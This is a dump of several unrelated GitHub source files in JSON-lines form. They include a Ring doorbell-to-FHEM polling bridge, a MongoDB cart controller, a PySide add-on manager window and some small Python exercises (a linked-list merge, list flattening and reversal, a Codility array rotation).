'/opt/fhem/www/ring/' # for video downloads\nPOLLS = 2 # Poll every x seconds\n\n# LOGGING\nlogger = logging.getLogger('ring_doorbell.doorbot')\nlogger.setLevel(log_level)\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler('ring.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nfh.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\nlogger = logging.getLogger('fhem_ring')\nlogger.setLevel(log_level)\nlogger.addHandler(ch)\nlogger.addHandler(fh)\n\n\n# Connecting to RING.com\nmyring = Ring(ring_user, ring_pass)\n\nfh = fhem.Fhem(fhem_ip, fhem_port)\n\ndef sendFhem(str):\n logger.debug(\"sending: \" + str)\n global fh\n fh.send_cmd(str)\n\ndef askFhemForReading(dev, reading):\n logger.debug(\"ask fhem for reading \" + reading + \" from device \" + dev)\n return fh.get_dev_reading(dev, reading)\n\ndef askFhemForAttr(dev, attr, default):\n logger.debug(\"ask fhem for attribute \"+attr+\" from device \"+dev+\" (default: \"+default+\")\")\n fh.send_cmd('{AttrVal(\"'+dev+'\",\"'+attr+'\",\"'+default+'\")}')\n data = fh.sock.recv(32000)\n return data\n\ndef setRing(str, dev):\n sendFhem('set Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\ndef attrRing(str, dev):\n sendFhem('attr Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\ndef srRing(str, dev):\n sendFhem('setreading Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\nnum_threads = 0\nthread_started = False\nlock = allocate_lock()\n\ndef getDeviceInfo(dev):\n dev.update()\n logger.info(\"Updating device data for device '\"+dev.name+\"' in FHEM...\")\n srRing('account ' + str(dev.account_id), dev)\n srRing('address ' + str(dev.address), dev) \n srRing('family ' + str(dev.family), dev) \n srRing('id ' + str(dev.id), dev) \n srRing('name ' + str(dev.name), dev) \n srRing('timezone ' + str(dev.timezone), dev) \n srRing('doorbellType ' + str(dev.existing_doorbell_type), dev)\n srRing('battery ' + str(dev.battery_life), dev)\n srRing('ringVolume ' + str(dev.volume), dev)\n srRing('connectionStatus ' + str(dev.connection_status), dev) \n srRing('WifiName ' + str(dev.wifi_name), dev) \n srRing('WifiRSSI ' + str(dev.wifi_signal_strength), dev) \n \n\ndef pollDevices():\n logger.info(\"Polling for events.\")\n global devs\n\n i=0\n while 1:\n for k, poll_device in devs.items():\n logger.debug(\"Polling for events with '\" + poll_device.name + \"'.\")\n if poll_device.check_alerts() and poll_device.alert:\n dev = devs[poll_device.alert.get('doorbot_id')]\n logger.info(\"Alert detected at '\" + dev.name + \"'.\")\n logger.debug(\"Alert detected at '\" + dev.name + \"' via '\" + poll_device.name + \"'.\")\n alertDevice(dev,poll_device.alert)\n time.sleep(POLLS)\n i+=1\n if i>600:\n break\n\ndef alertDevice(dev,alert):\n srRing('lastAlertDeviceID ' + str(dev.id), dev)\n srRing('lastAlertDeviceAccountID ' + str(dev.account_id), dev)\n srRing('lastAlertDeviceName ' + str(dev.name), dev)\n srRing('lastAlertSipTo ' + str(alert.get('sip_to')), dev)\n srRing('lastAlertSipToken ' + str(alert.get('sip_token')), dev)\n if(alert.get('kind') == 'ding'):\n setRing('ring', dev)\n srRing('lastAlertType ring', dev)\n his = dev.history(limit=100,kind='ding')\n if(len(his)>0):\n dev.recording_download(his[0]['id'], filename=fhem_path + 'last_ding_video.mp4',override=True)\n srRing('lastDingVideo ' + fhem_path + 'last_ding_video.mp4', dev)\n elif(alert.get('kind') == 'motion'):\n setRing('motion', dev)\n srRing('lastAlertType motion', dev)\n his = dev.history(limit=100,kind='motion')\n if(len(his)>0):\n dev.recording_download(his[0]['id'], filename=fhem_path + 'last_motion_video.mp4',override=True)\n srRing('lastMotionVideo ' + fhem_path + 'last_motion_video.mp4', dev)\n srRing('lastCaptureURL ' + str(dev.recording_url(dev.last_recording_id)), dev)\n\n\n\n# GATHERING DEVICES\ndevs = dict()\npoll_device = None\ntmp = list(myring.stickup_cams + myring.doorbells)\nfor t in tmp:\n devs[t.account_id] = t\n # all alerts can be recognized on all devices\n poll_device = t # take one device for polling\n\nlogger.info(\"Found \" + str(len(devs)) + \" devices.\")\n\n# START POLLING DEVICES\ncount = 1\nwhile count<6: # try 5 times\n try:\n while 1:\n for k, d in devs.items(): getDeviceInfo(d)\n pollDevices()\n\n except Exception as inst:\n logger.error(\"Unexpected error:\" + str(inst))\n logger.error(\"Exception occured. Retrying...\")\n time.sleep(5)\n if count == 5:\n raise\n\n count += 1\n","repo_name":"markuzzi/ring-fhem","sub_path":"ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7841130689","text":"from src.models.order import (\n add_product_order_items,\n create_order_items,\n remove_order_items,\n remove_product_order_items\n)\nfrom src.models.user import get_user_by_email\nfrom src.server.database import connect_db, db, disconnect_db\nfrom bson.objectid import ObjectId\n\n\nasync def order_crud():\n option = input(\"Entre com a opção de CRUD (order): \")\n \n await connect_db()\n order_collection = db.order_collection\n\n product_id = ObjectId(\"6325d2760b2b7841417c501f\")\n product_id2 = ObjectId(\"63307521df2fbdcac09a1cdd\")\n carrinho_id = \"6330d45cfed6a20ce04e625b\"\n user_email = \"lu2_domagalu@gmail.com\"\n\n if option == '1':\n user = await get_user_by_email(\n db.users_collection,\n user_email\n )\n order = await create_order_items(\n db.order_items_collection,\n user,\n product_id\n )\n print(order)\n elif option == '2':\n produto_adicionado = await add_product_order_items(\n db.order_items_collection,\n product_id2,\n carrinho_id\n )\n print(produto_adicionado)\n elif option == '3':\n produto_removido = await remove_product_order_items(\n db.order_items_collection,\n product_id2,\n carrinho_id\n )\n print(produto_removido)\n elif option == '4':\n carrinho_removido = await remove_order_items(\n db.order_items_collection,\n carrinho_id\n )\n print(carrinho_removido)\n\n await disconnect_db()\n","repo_name":"rafawessling/projeto_mongodb_carrinho","sub_path":"src/controllers/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16018744183","text":"# 21. Merge Two Sorted Lists\n# 두 정렬 리스트의 병합\n# 정렬되어 있는 두 연결 리스트를 합쳐라.\n\n# testcase\n# Input: list1 = [1,2,4], list2 = [1,3,4]\n# output: [1,1,2,3,4,4]\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\ndef sol(list1, list2):\n if (not list1) or (list2 and list1.val > list2.val):\n list1, list2 = list2, list1\n\n if list1:\n list1.next = sol(list1.next, list2)\n\n return list1\n","repo_name":"nash4826/Python-Algorithm","sub_path":"linkedList/question14.py","file_name":"question14.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34714074666","text":"from PySide.QtGui import QMainWindow, QTabWidget, QWidget\n\nfrom siding import addons, style, plugins\n\n###############################################################################\n# Constants and Storage\n###############################################################################\n\n_manager_window = None\n\n###############################################################################\n# The AddonTypeTab Class (with a horrible name)\n###############################################################################\n\nclass AddonTypeTab(QWidget):\n \"\"\"\n An instance of this class is created for each type of add-on registered\n with the system.\n \"\"\"\n\n def __init__(self, type, parent=None):\n QWidget.__init__(self, parent)\n\n # Get our info.\n self.name = type\n text, self.icon = addons.manager._types[type][-2:]\n if text:\n self.text = text\n else:\n self.text = ' '.join(x.capitalize() for x in\n self.name.replace('_').split(' '))\n\n if not self.icon:\n self.icon = ''\n\n # Set some stuff.\n self.setWindowTitle(self.text)\n self.setWindowIcon(style.icon(self.icon))\n\n###############################################################################\n# The ManagerWindow Class\n###############################################################################\n\nclass ManagerWindow(QMainWindow):\n \"\"\"\n This is the Add-on Manager's custom window. Not much else to say, really.\n \"\"\"\n\n def __init__(self, parent=None):\n ManagerWindow.__init__(self, parent)\n\n # Set the window title and size.\n self.setWindowTitle(self.tr(\"Add-on Manager\"))\n self.setMinimumSize(400, 300)\n\n # Build the main widget.\n self.tabs = QTabWidget(self)\n self.setCentralWidget(self.tabs)\n\n # Load up all our tabs.\n for addon_type in sorted(addons.manager._types.keys()):\n tab = AddonTypeTab(addon_type)\n self.tabs.addTab(tab, tab.windowIcon(), tab.windowTitle())\n\n # Let plugins get in on this.\n plugins.run_signal('opened_addon_manager', self)\n\n # Icons and Style!\n style.enable_aero(self)\n self.reload_icons()\n style.style_reloaded.connect(self.reload_icons)\n\n def reload_icons(self):\n \"\"\" Reload all of our icons. Which is... one icon. \"\"\"\n self.setWindowIcon(style.icon('addon-manager'))\n\n def showRaise(self):\n \"\"\" Show and raise the window. \"\"\"\n self.show()\n self.raise_()\n self.setFocus()\n\n ##### The Close Event #####################################################\n\n def closeEvent(self, event):\n \"\"\" Disconnect any signals and remove our reference. \"\"\"\n global _manager_window\n if _manager_window is self:\n _manager_window = None\n\n style.style_reloaded.disconnect(self.reload_icons)\n plugins.run_signal('closed_addon_manager', self)\n\n###############################################################################\n# The Starting Point\n###############################################################################\n\ndef show():\n \"\"\" Show the Add-on Manager's user interface. \"\"\"\n global _manager_window\n\n if not _manager_window:\n _manager_window = ManagerWindow()\n\n # Show the manager.\n _manager_window.showRaise()","repo_name":"stendec/siding","sub_path":"siding/addons/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"71294354397","text":"# 1- Bir listeyi düzleştiren (flatten) fonksiyon yazın. Elemanları birden çok katmanlı listelerden ([[3],2] gibi) oluşabileceği gibi, non-scalar verilerden de oluşabilir. Örnek olarak:\n# input: [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\n# output: [1,'a','cat',2,3,'dog',4,5]\n#\n# 2- Verilen listenin içindeki elemanları tersine döndüren bir fonksiyon yazın.\n# Eğer listenin içindeki elemanlar da liste içeriyorsa onların elemanlarını da tersine döndürün. Örnek olarak:\n# input: [[1, 2], [3, 4], [5, 6, 7]]\n# output: [[[7, 6, 5], [4, 3], [2, 1]]\n\n\ndef flatten(list0):\n \"\"\"\n Eğer list0 'ın elemanı bir liste değilse bu elemanı yeni listeye ekler.\n Eğer list0 'ın elemanıda bir liste ise fonksiyon kedisini çağırır(recursion). Böylece eleman liste olmayana kadar fonksiton kendini çağırır ve\n sonunda eleman bir liste değilse onu yeni listeye ekler.\n \"\"\"\n new_list = []\n for idx in list0:\n if isinstance(idx, list):\n new_list += flatten(idx)\n else:\n new_list.append(idx)\n\n return new_list\n\n\n# example for flatten function\nl = [[1, 'a', ['cat'], 2], [[[[[[[10, 20, ['x']]]]]]]], [[[3]], 'dog'], 4, 5]\n\nprint(flatten(l))\n\n\ndef reversed_elements(list0):\n \"\"\"\n Önce listenin elemanlarını slacing yöntemi kullanarak sondan başlayacak şekilde modifiye eder.\n Sonra listenin elemanlarıda bir liste mi diye kontrol edip eğer listeyse aynı işlem yine yapılır.\n \"\"\"\n \"\"\"\n Önce listenin elemanlarını slacing yöntemi kullanarak sondan başlayacak şekilde modifiye eder.\n Sonra listenin elemanlarıda bir liste mi diye kontrol edip eğer listeyse aynı işlem yine yapılır.\n \"\"\"\n list0 = list0[-1::-1]\n for idx in list0:\n if isinstance(idx, list):\n index = list0.index(idx) # düzenleyeceğimiz elemanın list0 içindeki indexsini bulma\n new_idx = idx[-1::-1]\n list0[index] = new_idx # düzenlediğimiz elemanı listenin ilgili kısmına koyuyoruz\n return list0\n\n# example for reserved_elements function\nprint(reversed_elements([[1, 2], [3, 4], [5, 6, 7]]))\n","repo_name":"evrnekc/patika_python_odevler","sub_path":"odev1.py","file_name":"odev1.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9194865043","text":"'''\nLesson2 - CyclicRotation\nhttps://app.codility.com/programmers/lessons/2-arrays/cyclic_rotation/\n'''\n# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A, K):\n # write your code in Python 3.6\n length = len(A)\n if length <= 1:\n return A\n new_array = [None] * length\n for i in range(length):\n new_array[(i+K)%length] = A[i]\n return new_array","repo_name":"ImmortalGarlic/coding-practice","sub_path":"codility/lesson2-arrays/CyclicRotation.py","file_name":"CyclicRotation.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}